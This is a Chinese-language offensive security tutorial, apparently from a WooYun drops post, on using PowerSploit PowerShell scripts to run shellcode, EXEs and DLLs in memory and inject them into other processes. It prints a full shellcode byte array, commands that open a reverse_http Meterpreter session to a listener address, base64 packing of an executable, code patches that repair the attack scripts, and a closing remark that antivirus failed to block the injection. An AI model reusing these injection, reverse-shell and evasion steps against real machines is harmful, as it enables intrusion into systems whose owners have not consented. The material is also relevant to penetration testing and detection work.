0x00 前言
写这篇文章有两个原因,一是想介绍一下powershell的高级使用技巧,二是我在测试一些powershell脚本时发现了很多bug,提交给作者后更新的也不及时,于是就有了自己维护代码的想法. 接下来我会陆续把在drops上发的代码上传到github,大家共同学习,共同进步。 地址如下:https://github.com/3gstudent
此图片来自于 http://dfir-blog.com/2015/09/27/dissecting-powershell-attacks/
0x01 简介
目前来说,Powershell依然能够bypass AV,以前的各种攻击技巧如果能够通过Powershell实现该有多好,所以这次先介绍一下如何利用Powershell分别加载Shellcode、exe、dll,以及通过Powershell如何向其他进程注入shellcode、dll。
0x02 测试环境
win7 x86
win7 x64
win8 x86
win8 x64
0x03 Code Execution
1、利用powershell加载shellcode
参考地址:
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
这个脚本不仅能够将shellcode注入到当前Powershell中,同时还支持在当前Powershell中反弹meterpreter,支持http和https协议。
测试1:
> 利用powershell加载shellcode
shellcode为弹出计算器
在Invoke--Shellcode.ps1尾部添加如下代码,并保存为CodeExecution-Shellcode.ps1
#!powershell
Invoke-Shellcode -Shellcode @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,
0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,
0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,
0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,
0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,
0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,
0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,
0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,
0x61,0x6c,0x63,0x00)
在win7 x86下
如图
在win 7 x64下,将Shellcode替换为64为Shellcode,执行同样成功,截图略
win8 x86成功,略。
win8 x64成功,略。
测试2:
> 利用powershell反弹meterpreter
在Invoke--Shellcode.ps1尾部添加如下代码,并保存为CodeExecution-Meterpreter.ps1
#!powershell
Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 192.168.16.245 -Lport 8080
在win7 x86下,
如图
win7 x64成功,略。
win8 x86成功,略。
win8 x64成功,略。
2、利用powershell加载exe
Invoke-ReflectivePEInjection.ps1实现了读取exe文件然后执行,本文给出一种加密exe然后用Powershell解密执行的方法,并比较几种加密方式的优劣。
示例exe:
vc新建控制台工程,使用如下代码:
#!c
printf("hello world");
Sleep(10000);
return 0;
生成test.exe,运行后输出hello world,等待10s进程退出
测试3:
> 使用Powershell读取test.exe并运行
在Invoke-ReflectivePEInjection.ps1尾部添加如下代码:
#!powershell
Invoke-ReflectivePEInjection -PEPath c:\test\test.exe -ExeArgs "Arg1" -ForceASLR
保存为3-CodeExecution-ReadExe.ps1,同test.exe放在同一目录
在win7 x86下,
如图
在win7 x64下,直接运行会报错,如图
解决方法:
test.exe是32位的程序,需要改成64位,所以将vc的编译选项改为x64,同时MFC的使用改为在静态库中使用MFC(熟悉c++的应该都懂)
换成64位的test.exe后执行,成功,如图
win8 x86成功,略。
win8 x64成功,略。
测试4:
> 使用Powershell读取加密的test.exe并运行
先将test.exe转换为Unicode再做base64编码存储,然后Powershell解密该编码运行test.exe
首先编写Powershell编码程序,保存为unicode+base64.ps1,代码如下:
#!powershell
$PEBytes = [System.IO.File]::ReadAllBytes("C:\test.exe")
$UnicodeBytes = [System.Text.Encoding]::Unicode.GetBytes($PEBytes)
$Base64Payload = [System.Convert]::ToBase64String($UnicodeBytes)
Set-Content test.b64 -Value $Base64Payload
上述代码的功能为读取test.exe,转换成Unicode格式再进行Base64编码,最终保存为test.b64文件
将3-CodeExecution-ReadExe.ps1作如下更改,并保存为4-CodeExecution-Exe(unicode+base64).ps1
第2906行替换为
#!powershell
$PEBytes1 = Get-Content (Resolve-Path $PEPath)
$PEBytes2 = [System.Convert]::FromBase64String($PEBytes1)
[Byte[]]$PEBytes = [System.Text.Encoding]::Unicode.GetString($PEBytes2)
最后一行替换为
#!powershell
Invoke-ReflectivePEInjection -PEPath c:\test\test.b64 -ExeArgs "Arg1" -ForceASLR
在win7 x86下,测试成功,但速度很慢,实际使用时只需要做base64编码就好,去掉转成Unicode的功能,只做base64编码,测试文件为base64.ps1、4-CodeExecution-Exe(base64).ps1,测试成功,如图
在win7 x64下,换用64位的test.exe,成功
win8 x86成功,略。
win8 x64成功,略。
3、利用powershell加载dll
参考地址:
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
https://github.com/PowerShellMafia/PowerSploit/tree/master/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL
示例dll:
使用上述链接中的dll,仅作测试
dll定义了3个导出函数:
#!c
StringFunc()
VoidFunc()
WStringFunc()
测试5:
> 使用Powershell加载DemoDLL.dll
在Invoke-ReflectivePEInjection.ps1尾部添加
#!powershell
Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString
保存为5-CodeExecution-dll.ps1
在win7 x86下成功加载导出函数WStringFunc(),如图
在win7 x64下,换成64位的DemoDLL,成功,如图
win8 x86成功,略。
win8 x64成功,略。
0x04 Process Injection
参考地址:
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
1、通过powershell向其他进程注入shellcode
测试6:
> 通过powershell向explorer.exe注入meterpreter
在Invoke--Shellcode.ps1尾部添加如下代码,保存为6-Process Injection-Shellcode.ps1
#!powershell
$Proc = Get-Process explorer
Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_http -Lhost 192.168.16.245 -Lport 8083 -Verbose
在win7 x86下执行报错,如图
通过阅读代码找到错误原因,需要手动指定系统判断,因此需要在337行添加$64bitCPU = $false
再次运行,解决问题,meterpreter成功注入到explorer.exe中,如图
win7 x64成功,略。
win8 x86成功,略。
win8 x64成功,略。
2、通过powershell向其他进程注入dll
参考地址:
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1
测试7:
> 通过powershell向explorer.exe注入DemoDLL.dll
在Invoke-DllInjection.ps1尾部添加如下代码,保存为7-Process Injection-dll.ps1
#!powershell
$Proc = Get-Process notepad
Invoke-DllInjection -ProcessId $Proc.Id -Dll DemoDLL.dll
将DemoDLL.dll注入explorer.exe,成功,删除DemoDLL.dll提示已在记事本中打开,如图
在win7 x64下,换成64位的DemoDLL,成功,如图
win8 x86成功,略。
win8 x64下,执行后报错,如图
查找错误位置,最终解决问题,需要更改第284行,将
if ($Architecture -ne 'X86')
更改为
if ($Architecture -eq 'X86')
并保存为7-Process Injection-dll(win8x64).ps1,然后执行成功,如图
0x05 小结
我在测试过程中开启了Norton Internet Security,可在进程注入的过程中并未被拦截,powershell在杀毒软件面前“似乎变成了透明”
powershell的“强大”正慢慢被发掘:)
注:
以上代码可在此下载:
https://github.com/3gstudent
本文由三好学生原创并首发于乌云drops,转载请注明
@DebugPreference 0x04的地址也有点问题,目测是CV过来的吧
学习了一个,超给力! 不过0x03 1. 的参考地址稍微有点小问题,最后的Invoke和Shellcode之间多一个-
Freebuf有个关于Powershell的视频也值得一看 :)